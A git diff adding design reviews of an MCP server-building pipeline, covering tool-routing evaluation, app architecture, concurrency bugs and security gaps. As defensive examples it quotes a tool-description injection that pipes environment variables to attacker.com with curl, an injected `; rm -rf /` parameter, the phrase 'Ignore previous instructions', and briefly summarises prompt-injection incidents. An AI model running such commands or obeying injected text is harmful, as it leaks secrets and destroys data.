Searching for a contact, then getting details, then updating — requires correct tool sequencing. The system prompts don't address multi-step chains. + +### 2. Paragon's Tool Calling Optimization Research (2025-2026) + +From Paragon's 50-test-case evaluation across 6 LLMs: +- **LLM choice has the biggest impact** on tool correctness. OpenAI o3 (2025-04-16) performed best. Claude 3.5 Sonnet was strong. The Factory's model recommendation (Opus for analysis, Sonnet for building) is sound. +- **Better tool descriptions improve performance more than better system prompts.** This validates the Factory's emphasis on the 6-part description formula. +- **Reducing tool count** (fewer tools per interaction) has a larger effect than improving descriptions. The Factory's 15-20 tools per interaction target aligns with this finding. +- **DeepEval's Tool Correctness metric** (correct tools / total test cases) and Task Completion metric (LLM-judged) are the industry standard for measuring tool calling quality. + +### 3. DeepEval Agent Evaluation Framework (2025-2026) + +DeepEval provides the most mature framework for evaluating AI agents: +- **Separate reasoning and action evaluation.** Reasoning (did the agent plan correctly?) and Action (did it call the right tools?) should be measured independently. +- **Key metrics:** PlanQualityMetric, PlanAdherenceMetric, ToolCorrectnessMetric, TaskCompletionMetric. +- **Production monitoring:** DeepEval supports `update_current_span()` for tracing agent actions in production — enabling real-time quality measurement. +- **LLM-as-judge for task completion:** Instead of hand-crafted ground truth, use an LLM to evaluate whether the task was completed. This scales to thousands of test cases. + +**Recommendation for MCP Factory:** Integrate DeepEval as the evaluation framework for Layer 3 functional testing. Replace the manual routing fixture approach with automated DeepEval test runs. + +### 4. 
MCP Apps Protocol (Official Extension — January 2026) + +The MCP Apps extension is now live (announced January 26, 2026). Key features: +- **`_meta.ui.resourceUri`** on tools — tools declare which UI to render +- **`ui://` resource URIs** — server-side HTML/JS served as MCP resources +- **JSON-RPC over postMessage** — bidirectional app↔host communication +- **`@modelcontextprotocol/ext-apps`** SDK — standardized App class with `ontoolresult`, `callServerTool`, `updateModelContext` +- **Client support:** Claude, ChatGPT, VS Code, Goose — all support MCP Apps today + +**Critical implication for LocalBosses:** The APP_DATA block pattern (JSON embedded in the LLM's text response) is now legacy. MCP Apps provides the official way to deliver UI from tools. The medium-term roadmap in the Integrator skill (route structuredContent directly to apps) should be accelerated, and the long-term roadmap (MCP Apps protocol) is no longer "future" — it's available NOW. + +### 5. Tool Description Optimization Research + +From academic papers and production experience: +- **Explicit negative constraints** in descriptions ("Do NOT use when...") reduce misrouting more than positive guidance ("Use when...") +- **Field name lists** in descriptions (`Returns {name, email, status}`) help the LLM understand response shape — critical for APP_DATA generation +- **Parameter descriptions** matter less than tool-level descriptions for routing accuracy +- **Ordering tools by frequency of use** in the tools list can improve selection for top tools (LLMs have position bias — first tools are slightly more likely to be selected) + +--- + +## Proposed Improvements (specific, actionable, with examples) + +### CRITICAL Priority (do these first) + +#### 1. Eliminate the LLM Re-serialization Bottleneck + +**Problem:** The entire app data flow depends on the LLM correctly embedding JSON in its text response. This is the #1 source of quality failures. 
+ +**Solution:** Implement the "medium-term" architecture NOW — route `structuredContent` from tool results directly to the app iframe, bypassing LLM text generation. + +**Implementation:** +```typescript +// In chat/route.ts — intercept tool results BEFORE LLM generates text +const toolResults = await mcpClient.callTool(toolName, args); + +if (toolResults.structuredContent && activeAppId) { + // Route structured data directly to the app — no LLM re-serialization + await sendToApp(activeAppId, toolResults.structuredContent); +} + +// LLM still generates the text explanation, but doesn't need to embed JSON +// APP_DATA block becomes optional fallback, not primary data channel +``` + +**Impact:** Eliminates Quality Drop Points 4, 5, and 6 from the user journey. Data goes from tool → app with zero lossy transformation. + +#### 2. Adopt MCP Apps Protocol + +**Problem:** The custom APP_DATA pattern works only in LocalBosses. MCP Apps is now an official standard supported by Claude, ChatGPT, VS Code, and Goose. + +**Solution:** Migrate MCP servers to use `_meta.ui.resourceUri` on tools, serve app HTML via `ui://` resources, and use `@modelcontextprotocol/ext-apps` SDK in apps. + +**Implementation path:** +1. Add `_meta.ui.resourceUri` to tool definitions in the server builder template +2. Register app HTML files as `ui://` resources in each MCP server +3. Update app template to use `@modelcontextprotocol/ext-apps` App class for data reception +4. Maintain backward compatibility with postMessage/polling for LocalBosses during transition + +**Impact:** MCP tools work in ANY MCP client (Claude, ChatGPT, VS Code) — not just LocalBosses. Huge distribution multiplier. + +#### 3. Automated Tool Routing Evaluation with DeepEval + +**Problem:** Tool routing accuracy is tested with static fixture files that aren't actually run through an LLM. It's the most important quality metric with the least real testing. 
+ +**Solution:** Integrate DeepEval's ToolCorrectnessMetric and TaskCompletionMetric into the QA pipeline. + +**Implementation:** +```python +# tests/tool_routing_eval.py +from deepeval import evaluate +from deepeval.metrics import ToolCorrectnessMetric +from deepeval.test_case import LLMTestCase, ToolCall + +test_cases = [ + LLMTestCase( + input="Show me all active contacts", + actual_output=agent_response, + expected_tools=[ToolCall(name="list_contacts", arguments={"status": "active"})], + tools_called=[actual_tool_call], + ), + # ... 20+ test cases per server +] + +metric = ToolCorrectnessMetric() +evaluate(test_cases, [metric]) +# Returns: Tool Correctness Rate with per-case breakdowns +``` + +**Impact:** Transforms tool routing testing from theater (fixture files exist) to real measurement (LLM actually routes correctly X% of the time). + +### HIGH Priority + +#### 4. Add "Updating..." State to Apps + +**Problem:** When the user asks a follow-up question, the app shows stale data with no visual indicator that new data is incoming. + +**Solution:** Add a fourth state: "updating" — shows a subtle overlay or indicator on the existing data while new data loads. + +**Implementation:** +```javascript +// In app template — add updating state +function showState(state) { + document.getElementById('loading').style.display = state === 'loading' ? 'block' : 'none'; + document.getElementById('empty').style.display = state === 'empty' ? 'block' : 'none'; + const content = document.getElementById('content'); + content.style.display = (state === 'data' || state === 'updating') ? 'block' : 'none'; + + // Updating overlay + const overlay = document.getElementById('updating-overlay'); + if (overlay) overlay.style.display = state === 'updating' ? 
'flex' : 'none'; +} + +// When user sends a new message (detected via postMessage from host) +window.addEventListener('message', (event) => { + if (event.data.type === 'user_message_sent') { + showState('updating'); // Show "Updating..." on current data + } + if (event.data.type === 'mcp_app_data') { + handleData(event.data.data); // Replace with new data + } +}); +``` + +**Impact:** User knows the system is working on their request. Reduces perceived latency by 50%+. + +#### 5. Wire Up Bidirectional Communication (App → Host) + +**Problem:** `sendToHost('navigate')`, `sendToHost('tool_call')`, and `sendToHost('refresh')` are documented in the app designer but never wired up on the host side. + +**Solution:** Document and implement the host-side handler in the integrator skill. + +**Implementation (in LocalBosses host):** +```typescript +// In the iframe wrapper component +iframe.contentWindow.addEventListener('message', (event) => { + if (event.data.type === 'mcp_app_action') { + switch (event.data.action) { + case 'navigate': + openApp(event.data.payload.app, event.data.payload.params); + break; + case 'refresh': + resendLastToolCall(); + break; + case 'tool_call': + sendMessageToThread(`[Auto] Calling ${event.data.payload.tool}...`); + // Trigger the tool call through the chat API + break; + } + } +}); +``` + +**Impact:** Enables drill-down (click contact in grid → open contact card), refresh buttons, and in-app actions. Transforms static apps into interactive ones. + +#### 6. Schema Contract Between Tools and Apps + +**Problem:** No validation that the tool's `structuredContent` matches what the app's `render()` function expects. These can drift silently. + +**Solution:** Generate a shared JSON schema that both the tool's `outputSchema` and the app's `validateData()` reference. 
+ +**Implementation:** +``` +{service}-mcp/ +├── schemas/ +│ ├── contact-grid.schema.json # Shared schema +│ └── dashboard.schema.json +├── src/tools/contacts.ts # outputSchema references this +└── app-ui/contact-grid.html # validateData() references this +``` + +```javascript +// In app template — load schema at build time (inline it) +const EXPECTED_SCHEMA = {"required":["data","meta"],"properties":{"data":{"type":"array"}}}; + +function validateData(data, schema) { + // Validate against the same schema the tool declares as outputSchema + // If mismatch, show diagnostic empty state: "Data shape mismatch — tool returned X, app expected Y" +} +``` + +**Impact:** Catches data shape mismatches during development instead of in production. Enables clear error messages when something goes wrong. + +### MEDIUM Priority + +#### 7. Add Multi-Intent and Correction Handling to System Prompts + +**Problem:** Users often type multi-intent messages ("show me contacts and also create a new one") or corrections ("actually, I meant the other list"). The system prompts don't address these. + +**Solution:** Add explicit instructions to the channel system prompt template: + +``` +MULTI-INTENT MESSAGES: +- If the user asks for multiple things in one message, address them sequentially. +- State which you're handling first and that you'll get to the others. +- Complete one action before starting the next. + +CORRECTIONS: +- If the user says "actually", "wait", "no I meant", "the other one", etc., + treat this as a correction to your previous action. +- If they reference "the other one" or "that one", check the previous results + in the conversation and clarify if needed. +- Never repeat the same action — understand what changed. +``` + +#### 8. Add Token Counting to the Builder Skill + +**Problem:** The builder skill says "keep descriptions under 200 tokens" but doesn't provide measurement. 
+ +**Solution:** Add a token counting step to the build workflow: + +```bash +# Add to build script +node -e " +const tools = require('./dist/tools/index.js'); +// Count tokens per tool description (approximate: words * 1.3) +for (const tool of tools) { + const tokens = Math.ceil(tool.description.split(/\s+/).length * 1.3); + const status = tokens > 200 ? '⚠️' : '✅'; + console.log(\`\${status} \${tool.name}: ~\${tokens} tokens\`); +} +" +``` + +#### 9. Create Per-Service Test Fixtures in the Designer Phase + +**Problem:** The QA skill has generic fixtures, but each service needs fixtures that match its specific data shapes. + +**Solution:** The app designer should create `test-fixtures/{service}/{app-name}.json` alongside each HTML app, using the tool's `outputSchema` to generate realistic test data. + +#### 10. Add Production Quality Monitoring Guidance + +**Problem:** All testing is pre-ship. No guidance on measuring quality in production. + +**Solution:** Add a "Layer 6: Production Monitoring" to the QA skill: + +```markdown +### Layer 6: Production Monitoring (post-ship) + +Metrics to track: +- APP_DATA parse success rate (target: >98%) +- Tool correctness (sample 5% of interactions, LLM-judge) +- Time to first app render (target: <3s P50, <8s P95) +- User retry rate (how often do users rephrase the same request) +- Thread completion rate (% of threads where user gets desired outcome) + +Implementation: Log these metrics in the chat route and aggregate weekly. +``` + +--- + +## The "Magic Moment" Audit + +### What makes it feel AMAZING: +1. **Instant visual gratification.** User types "show me contacts" → within 2s, a beautiful dark-themed data grid appears with sortable columns, status badges, and realistic data. This first impression is the hook. +2. **The dark theme.** It looks like a premium product, not a hackathon demo. The consistent color palette, proper typography, and polished components signal quality. +3. 
**Contextual empty states.** Instead of "No data" → "Try 'show me all active contacts' or 'list recent invoices'" — this teaches the user what to do next. +4. **Loading skeletons.** The shimmer effect during loading says "something is happening" — much better than a blank screen or spinner. + +### What makes it feel MEDIOCRE: +1. **The 3-8 second wait.** User types → AI processes → tool calls API → AI generates response + APP_DATA → frontend parses → app renders. Every step adds latency. For "show me contacts," 3 seconds feels slow compared to clicking a button in a traditional app. +2. **Stale data between updates.** User types a follow-up → app shows old data → eventually updates. No "updating..." indicator. Feels broken. +3. **Dead interactivity.** Click a contact name in the grid — nothing happens. The data grid looks interactive (hover effects, click cursor) but clicking doesn't navigate to the detail card. +4. **One-way conversation with apps.** The app is a display-only surface. You can't interact with it to drive the conversation — no "click to filter" or "select rows to export." +5. **JSON failures.** When APP_DATA parsing fails (and it does, maybe 5-10% of the time), the app stays on the loading state. The user sees the AI's text response saying "here are your contacts" but the app shows nothing. Confusing and frustrating. + +### What would make it feel MAGICAL: +1. **Streaming data rendering.** As the AI generates the response, the app starts rendering partial data. User sees the table building row by row — feels alive and fast. +2. **Click-to-drill-down.** Click a contact name → detail card opens automatically. Click a pipeline deal → detail view. Apps are interconnected. +3. **App-driven conversation.** Select 3 contacts in the grid → click "Send email" → AI drafts an email to those contacts. The app DRIVES the AI, not just displays data from it. +4. **Live dashboards.** After initial render, the dashboard polls for updates every 30 seconds. 
Numbers tick up. Sparklines animate. Feels like a real ops dashboard. +5. **Inline editing.** Click a field in the detail card → edit it in place → app calls `sendToHost('tool_call', { tool: 'update_contact', args: { id: '123', name: 'New Name' } })`. Instant save. + +--- + +## Testing Reality Check (what the QA skill actually catches vs what it misses) + +### What it CATCHES (real quality): +| Test | What it validates | Real-world impact | +|---|---|---| +| TypeScript compilation | Code compiles, types are correct | Prevents server crashes | +| MCP Inspector | Protocol compliance | Server works with any MCP client | +| Playwright visual tests | Apps render all 3 states, dark theme, responsive | Users see a polished UI | +| axe-core accessibility | WCAG AA, keyboard nav, screen reader | Accessible to all users | +| XSS payload testing | No script injection via user data | Security against malicious data | +| Chaos testing (500 errors, wrong formats, huge data) | Graceful degradation | App doesn't crash under adverse conditions | +| Static cross-reference | All app IDs consistent across 4 files | No broken routes or missing entries | +| File size budgets | Apps under 50KB | Fast loading | + +### What it MISSES (testing theater): +| Gap | Why it matters | Current state | +|---|---|---| +| **Tool routing accuracy with real LLM** | This is THE quality metric — does the AI pick the right tool? | Fixture files exist but aren't run through an LLM | +| **APP_DATA generation quality** | Does the LLM produce valid JSON that matches the app's expectations? 
| Not tested at all — parser is tested, generator is not | +| **End-to-end data flow** | Message → AI → tool → API → APP_DATA → app render → correct data | Manual only — no automated E2E test | +| **Multi-step tool chains** | "Find John's email and send him a meeting invite" — requires 3 tool calls in sequence | Not tested — all routing tests are single-tool | +| **Conversation context** | "Show me more details about the second one" — requires memory of previous results | Not addressed in any skill | +| **Real API response shape matching** | Do MSW mocks match real API responses? | Mocks are hand-crafted, never validated against real APIs | +| **Production quality monitoring** | Is quality maintained after ship? | No post-ship quality measurement at all | +| **APP_DATA parse failure rate** | How often does the LLM produce unparseable JSON? | Not measured — the parser silently falls back | + +### The Hard Truth: +The QA skill is excellent at testing the *infrastructure* (server compiles, apps render, accessibility passes, security is clean) but weak at testing the *AI interaction quality* (tool routing, data generation, multi-step flows). The infrastructure is maybe 40% of the user experience; the AI interaction quality is 60%. The testing effort is inverted. + +--- + +## Summary: Top 5 Actions by Impact + +| # | Action | Impact | Effort | Priority | +|---|---|---|---|---| +| 1 | **Route structuredContent directly to apps** (bypass LLM re-serialization) | Eliminates the #1 failure mode, improves reliability from ~90% to ~99% | Medium — requires chat route refactor | CRITICAL | +| 2 | **Adopt MCP Apps protocol** | Tools work in Claude/ChatGPT/VS Code, not just LocalBosses. Future-proofs everything. 
| High — requires server + app template updates | CRITICAL | +| 3 | **Automated tool routing evaluation with DeepEval** | Transforms testing from theater to real measurement | Medium — requires DeepEval integration + test case authoring | CRITICAL | +| 4 | **Wire up bidirectional communication** (app → host) | Transforms static apps into interactive experiences | Low — handler code is simple | HIGH | +| 5 | **Add "updating" state + schema contracts** | Eliminates stale data confusion and silent data shape mismatches | Low — small template + schema file changes | HIGH | + +--- + +*This review was conducted with one goal: does the end user have an amazing experience? The MCP Factory pipeline is impressively thorough — it's the most complete MCP development framework I've seen. The infrastructure is production-grade. The gap is in the AI-interaction layer: the fragile LLM→JSON→app data flow, the untested tool routing accuracy, and the static nature of the apps. Fix those three things, and this system ships magic.* diff --git a/mcp-factory-reviews/boss-mei-proposals.md b/mcp-factory-reviews/boss-mei-proposals.md new file mode 100644 index 0000000..7feff8a --- /dev/null +++ b/mcp-factory-reviews/boss-mei-proposals.md @@ -0,0 +1,786 @@ +# Boss Mei — Final Review & Improvement Proposals + +**Reviewer:** Director Mei — Enterprise Production & Scale Systems Authority +**Date:** 2026-02-04 +**Scope:** Full MCP Factory pipeline (6 skills) — production readiness assessment +**Verdict:** **NOT READY FOR PRODUCTION AT A BANK** — but with targeted fixes, could be within 2-3 weeks + +--- + +## Pass 1 Notes (Per Skill — Production Readiness Assessment) + +### 1. 
MCP-FACTORY.md (Pipeline Orchestrator) + +**What's good:** +- Clear 6-phase pipeline with defined inputs/outputs per phase +- Quality gates at every stage — this is production-grade thinking +- Agent parallelization (Phases 2 & 3 concurrent) is correct +- Inventory tracking (30 untested servers) shows awareness of tech debt + +**What concerns me:** +- **No rollback strategy at the pipeline level.** If Phase 4 fails, there's no automated way to undo Phases 2-3 artifacts. Each server build is fire-and-forget. +- **No versioning scheme for servers.** When you have 30+ servers, you need to know which version of the analysis doc produced which server build. There's no traceability. +- **No dependency management between servers.** What happens when two servers share the same API (e.g., GHL CRM tools used across multiple channels)? No guidance on deduplication. +- **Estimated times are optimistic.** "30-60 minutes" for a large API analysis — in practice, complex OAuth APIs (Salesforce, HubSpot) take 3-4 hours with their quirky auth flows. +- **Missing: capacity planning.** 30+ servers all running as stdio processes means 30+ Node.js processes. On a Mac Mini with 8/16GB RAM, that's a problem. + +**Production readiness: 7/10** — solid architecture, needs operational depth. + +--- + +### 2. mcp-api-analyzer (Phase 1) + +**What's good:** +- API style detection (REST/GraphQL/SOAP/gRPC/WebSocket) is comprehensive +- Pagination pattern catalog is excellent — covers all 8 common patterns +- Tool description formula (6-part with "When NOT to use") is research-backed +- Elicitation candidates section shows protocol-awareness +- Content annotations planning (audience + priority) is forward-thinking +- Token budget awareness with specific targets (<5,000 tokens per server) + +**What concerns me:** +- **No rate limit testing strategy.** The analyzer documents rate limits but doesn't recommend actually testing them before production. A sandbox environment should be mandatory. 
+- **OAuth2 device code flow not covered.** Many IoT and headless APIs use device_code grant — relevant for MCP servers running headlessly. +- **Version deprecation section is thin.** "Check for sunset timelines" is not enough. Need a specific cadence for re-checking API versions (quarterly minimum). +- **Missing: webhook/event-driven patterns.** The doc says "note but don't deep-dive" on webhooks. For production, many tools NEED webhook support for real-time data (e.g., CRM deal updates, payment notifications). +- **Missing: API sandbox/test environment detection.** The analyzer should flag whether the API has a sandbox, because this directly affects how QA can be done. + +**Production readiness: 8/10** — strongest skill, minor gaps. + +--- + +### 3. mcp-server-builder (Phase 2) + +**What's good:** +- Circuit breaker pattern is implemented correctly +- Request timeouts via AbortController — essential, many builders miss this +- Structured logging on stderr (JSON format with request IDs) — production-grade +- Pluggable pagination strategies — well-architected +- Dual transport (stdio + Streamable HTTP) with env var selection +- Health check tool always included — excellent operational practice +- Error classification (protocol vs tool execution) follows spec correctly +- Token budget targets are realistic (<200 tokens/tool, <5,000 total) + +**What concerns me (CRITICAL):** + +1. **Circuit breaker has a race condition.** The `half-open` state allows ONE request through, but if multiple tool calls arrive simultaneously (common in multi-turn conversations), they ALL pass through before the circuit records success/failure. This can overwhelm a recovering API. + +2. **No jitter on retry delays.** `RETRY_BASE_DELAY * Math.pow(2, attempt)` creates thundering herd — all retrying clients hit the API at exactly the same time. Must add random jitter. + +3. **Memory leak risk in HTTP transport session management.** `sessions` Map grows unboundedly. 
Dead sessions (client disconnected) are only removed on explicit DELETE. In production, network interruptions mean many sessions will never be cleaned up. **This WILL cause OOM over time.** + +4. **Rate limit tracking is per-client-instance, not per-API-key.** If you have multiple MCP server instances behind a load balancer sharing the same API key, each instance tracks its own rate limit counters independently. They'll collectively exceed the limit. + +5. **The `paginate()` method's `any` type casts.** Multiple `as any` casts in the pagination code — if the API response shape changes, these silently pass and produce runtime errors downstream. + +6. **No request deduplication.** If the LLM calls the same tool twice simultaneously (happens with parallel tool calling), two identical API requests fire. For GET it's wasteful, for POST it can create duplicates. + +7. **OAuth2 token refresh has no mutex.** In the client_credentials pattern, if the token expires and 5 requests arrive simultaneously, all 5 will attempt to refresh the token. Need a lock/semaphore. + +8. **`AbortController` timeout in the `finally` block is correct**, but the timeout callback still fires after the controller is garbage-collected in some Node.js versions. Should explicitly call `controller.abort()` in the clearTimeout path for safety. + +**Production readiness: 6/10** — good foundation, but the concurrency bugs and memory leak are production-killers. + +--- + +### 4. 
mcp-app-designer (Phase 3) + +**What's good:** +- Design system is comprehensive (color palette, typography, spacing tokens) +- WCAG AA compliance is explicitly called out with contrast ratios +- 9 app type templates covering common patterns +- Three-state rendering (loading/empty/data) is mandatory +- Error boundary with window.onerror — essential for iframe stability +- Bidirectional communication (sendToHost) enables app→host interaction +- Accessibility: sr-only, focus management, prefers-reduced-motion +- Interactive Data Grid with sort, filter, expand, bulk select — feature-rich + +**What concerns me:** + +1. **XSS in `escapeHtml()` function uses DOM-based escaping.** `document.createElement('div').textContent = text` is safe in browsers, but if anyone ever renders this server-side (SSR), it won't work. Also, this approach creates a DOM element per escape call — at scale (1000 rows), that's 6000+ DOM element creations. + +2. **Polling fallback has no circuit breaker.** If `/api/app-data` is down, the app retries 20 times with increasing delays. That's up to 20 failed requests per app per session. With 30+ apps, that's 600 failed requests hammering a broken endpoint. + +3. **`postMessage` has NO origin validation.** The template accepts messages from ANY origin (`*`). In production, this means any page that can embed the iframe (or any browser extension) can inject arbitrary data into the app. This is a known security vulnerability pattern. + +4. **`setInterval(pollForData, 3000)` in the old reference** — though the newer template uses exponential backoff, verify all existing apps use the new pattern. Fixed-interval polling at 3s is a DoS vector. + +5. **Interactive Data Grid's `handleSearch` has double-sort bug.** When search + sort are both active, `handleSort` is called twice, toggling the direction back. The comment says "toggle it back" but this is a UX bug. + +6. **Missing: Content Security Policy.** No CSP meta tag in the template. 
Single-file HTML apps with inline scripts need `script-src 'unsafe-inline'`, but should at least restrict form actions, frame ancestors, and connect-src. + +7. **Missing: iframe sandboxing guidance.** The apps run in iframes but there's no guidance on the `sandbox` attribute the host should apply. + +**Production readiness: 7/10** — solid design system, security gaps need immediate attention. + +--- + +### 5. mcp-localbosses-integrator (Phase 4) + +**What's good:** +- Complete file-by-file checklist (5 files to update) +- System prompt engineering guidelines are excellent (structured, budgeted, with few-shot examples) +- APP_DATA failure mode catalog with parser pattern — very production-aware +- Thread state management with localStorage limits documented +- Rollback strategies (git, feature-flag, manifest-based) — good operational thinking +- Integration validation script that cross-references all 4 files — catches orphaned entries +- Intake question quality criteria with good/bad examples +- Token budget targets for prompts (<500 channel, <300 addon) + +**What concerns me:** + +1. **APP_DATA parsing is fragile by design.** The entire data flow depends on the LLM generating valid JSON inside a comment block. Research shows LLMs produce malformed JSON 5-15% of the time. The fallback parser helps, but this is an architectural fragility — you're trusting probabilistic output for deterministic rendering. + +2. **No schema validation on APP_DATA before sending to app.** The parser extracts JSON, but nothing validates it matches what the app expects. A valid JSON object with wrong field names silently produces broken apps. + +3. **Thread cleanup relies on client-side code.** The `cleanupOldThreads` function is recommended but not enforced. Without it, localStorage grows indefinitely. At 5MB, you hit `QuotaExceededError` and threads start silently failing. + +4. 
**System prompt injection risk.** The system prompt includes user-facing instructions like "TOOL SELECTION RULES." If an attacker puts "Ignore previous instructions" in a chat message, the LLM might comply because the system prompt wasn't hardened against injection. Need system prompt hardening techniques. + +5. **No rate limiting on thread creation.** A user (or bot) can create unlimited threads, each consuming localStorage and server-side context. No guard against abuse. + +6. **Validation script uses regex to parse TypeScript.** This is inherently fragile — template strings, multi-line expressions, and comments can all cause false positives/negatives. AST-based parsing (ts-morph or TypeScript compiler API) would be more reliable. + +7. **Missing: canary deployment guidance.** The feature-flag strategy is described but there's no guidance on gradually rolling out a channel to a subset of users before full deployment. + +**Production readiness: 7/10** — operationally aware, but the APP_DATA architectural fragility is a long-term concern. + +--- + +### 6. mcp-qa-tester (Phase 5) + +**What's good:** +- 6-layer testing architecture with quantitative metrics — extremely thorough +- MCP protocol compliance testing (Layer 0) using MCP Inspector + custom JSON-RPC client +- structuredContent schema validation against outputSchema +- Playwright visual testing + BackstopJS regression +- axe-core accessibility automation with score thresholds +- Performance benchmarks (cold start, latency, memory, file size) +- Chaos testing (API 500s, wrong formats, huge datasets, rapid-fire messages) +- Security testing (XSS payloads, postMessage origin, key exposure) +- Comprehensive test data fixtures library (edge cases, adversarial, unicode, scale) +- Automated QA shell script with persistent reporting +- Regression baselines and trending + +**What concerns me:** + +1. **Layer 4 (live API testing) is the weakest link.** The credential management strategy is documented but manual. 
With 30+ servers, manually managing .env files is error-prone. Need a secrets manager (Vault, AWS Secrets Manager, or at minimum encrypted at rest). + +2. **No test isolation.** Jest tests with MSW are good, but there's no guidance on ensuring tests don't interfere with each other. If one test modifies MSW handlers and doesn't clean up, subsequent tests get unexpected behavior. + +3. **MCP protocol test client is too simple.** The `MCPTestClient` reads lines, but MCP over stdio sends JSON-RPC messages that may span multiple lines (when using content with newlines). Need proper message framing. + +4. **No load/stress testing.** Performance testing covers cold start and single-request latency, but not concurrent load. What happens when 10 users hit the same MCP server simultaneously over HTTP? No guidance. + +5. **Tool routing tests are framework-only, not actual LLM tests.** The routing fixtures validate that the expected tools exist, but don't actually test that the LLM selects the right tool. This is the MOST IMPORTANT test for production, yet it requires the LLM in the loop — there's no harness for that. + +6. **Missing: smoke test for deployment.** After deploying to production, need a post-deployment smoke test that validates the server is reachable, tools respond, and at least one app renders. The QA script assumes a development environment. + +7. **BackstopJS baseline management at scale.** With 30+ servers × 5+ apps × 3 viewports = 450+ screenshots. That's a lot of baselines to maintain. Need guidance on selective regression (only re-test changed servers). + +**Production readiness: 8/10** — most comprehensive testing framework I've seen for MCP, but needs LLM-in-the-loop testing and load testing. + +--- + +## Pass 2 Notes (Operational Gaps, Race Conditions, Security Issues) + +### Can a team operate 30+ servers built with these skills? + +**Short answer: Not without additional operational infrastructure.** + +Gaps: +1. 
**No centralized health dashboard.** Each server has a `health_check` tool, but nothing aggregates health across all 30+ servers. An operator can't answer "which servers are healthy right now?" without calling each one individually. + +2. **No alerting integration.** The structured logging is good, but there's no guidance on connecting it to PagerDuty, Slack alerts, or any alerting system. In production, you need to know when circuit breakers trip within minutes, not hours. + +3. **No centralized log aggregation.** Each server logs to stderr. With 30+ servers, that's 30+ separate log streams. Need guidance on piping to a centralized system (stdout → journald → Loki/Datadog/CloudWatch). + +4. **No deployment automation.** Building a server is documented, deploying it is not. There's no Dockerfile, docker-compose, systemd service file, or PM2 ecosystem file. Each server is assumed to run manually. + +5. **No dependency update strategy.** 30+ servers × package.json = 30+ sets of npm dependencies. When MCP SDK ships a breaking change, who updates all 30? Need a monorepo or automated dependency update workflow. + +### Incident Response + +**What happens when an API goes down at 3 AM?** + +The circuit breaker opens (good), the health_check shows "unhealthy" (good), but: +- Nobody is alerted +- No runbook exists for "API is down" +- No guidance on whether to restart the server, wait, or disable the channel +- No SLA expectations documented per API + +**What happens when a tool returns wrong data?** + +- The LLM generates APP_DATA based on wrong data +- The app renders it — user sees incorrect information +- No data validation layer between tool output and LLM consumption +- No "data looks suspicious" detection + +### Race Conditions Identified + +1. **Circuit breaker half-open concurrent requests** (described in Pass 1) — CRITICAL +2. **OAuth token refresh thundering herd** — CRITICAL +3. 
**localStorage thread cleanup vs active write** — if cleanup runs while a thread is being created, the new thread may be deleted immediately +4. **Rapid postMessage updates** — the template handles this via deduplication (`JSON.stringify` comparison), but this comparison is O(n) on data size and blocks the UI thread for large datasets + +### Memory Leak Risks + +1. **HTTP session Map** — unbounded growth, no TTL, no max size — CRITICAL +2. **Polling timers in apps** — if `clearTimeout(pollTimer)` fails (e.g., render throws before clearing), orphaned timers accumulate +3. **AbortController in retry loops** — each retry creates a new AbortController. If a request hangs past the timeout but doesn't complete, the old controller stays in memory +4. **Logger request IDs** — no concern, short-lived strings +5. **Tool registry lazy loading** — tools load once, handlers reference client — no leak here + +### Security Posture Assessment + +**Adequate for internal tools? Yes, mostly.** +**Adequate for production at a bank? NO.** + +Critical gaps: +1. **No input sanitization between LLM output and tool parameters.** The LLM generates tool arguments, Zod validates the schema, but doesn't sanitize for injection. A prompt-injected LLM could pass `; rm -rf /` as a parameter if the tool eventually shells out. +2. **No postMessage origin validation in app template** — any page can inject data +3. **No CSP in app template** — inline scripts are unconstrained +4. **API keys stored in plain .env files** — no encryption at rest +5. **No audit logging** — tool calls are logged but not in a tamper-proof audit trail +6. **No rate limiting on tool calls** — a compromised LLM could invoke destructive tools in a tight loop + +--- + +## Research Findings (Production Patterns and Incidents) + +### Real-World MCP Security Incidents (2025-2026) + +1. 
**Supabase MCP "Lethal Trifecta" Attack (mid-2025):** Cursor agent running with privileged service-role access processed support tickets containing hidden SQL injection. Attacker exfiltrated integration tokens through a public thread. Root cause: privileged access + untrusted input + external communication channel. + +2. **Asana MCP Data Exposure (June 2025):** Customer data leaked between MCP instances due to a bug. Asana published a post-mortem. Lesson: multi-tenant MCP deployments need strict data isolation. + +3. **492 Exposed MCP Servers (2025):** Trend Micro found 492 MCP servers publicly exposed with no authentication. Many had command-execution flaws. Lesson: MCP servers MUST NOT be internet-accessible without authentication. + +4. **mcp-remote Command Injection:** Vulnerability in the mcp-remote package allowed command injection. Lesson: MCP ecosystem supply chain is immature — audit dependencies. + +5. **Tool Description Injection (ongoing):** Researchers demonstrated that malicious tool descriptions can inject hidden prompts. The weather_lookup example: hiding `curl -X POST attacker.com/exfil -d $(env)` in a tool description. Lesson: tool descriptions are an attack vector. + +### Production Architecture Patterns (2025-2026) + +1. **MCP Gateway Pattern (Microsoft, IBM, Envoy):** A reverse proxy that fronts multiple MCP servers behind one endpoint. Adds session-aware routing, centralized auth, policy enforcement, observability. Microsoft's `mcp-gateway` is Kubernetes-native. IBM's `ContextForge` federates MCP + REST + A2A. Envoy AI Gateway provides MCP proxy with multiplexed streams. + +2. **Container-Per-Server (ToolHive, Docker):** Each MCP server runs in its own container. ToolHive by Stacklok provides container lifecycle management with zero-config observability. Docker's blog recommends using Docker as the MCP server gateway. Key insight: containers provide process isolation + resource limits that stdio doesn't. + +3. 
**Sidecar Observability (ToolHive):** Rather than modifying each MCP server, a sidecar proxy intercepts MCP traffic and emits OpenTelemetry spans. Zero server modification. This is the recommended approach for retrofitting observability onto existing servers. + +### Observability Best Practices + +From Zeo's analysis of 16,400+ MCP server implementations: +- **73% of production outages start at the transport/protocol layer** — yet it's the most overlooked +- **Agents fail 20-30% of the time without recovery** — human oversight is essential +- **Method-not-found errors (-32601) above 0.5% indicate tool hallucination** — a critical reliability signal +- **JSON-RPC parse errors (-32700) spikes correlate with buggy clients or scanning attempts** +- Three-layer monitoring model: Transport → Tool Execution → Task Completion + +--- + +## Proposed Improvements (Specific, Actionable, With Corrected Code) + +### CRITICAL: Fix Circuit Breaker Race Condition + +**Problem:** Half-open state allows unlimited concurrent requests. +**Fix:** Add a mutex/semaphore so only ONE request passes through in half-open state. 
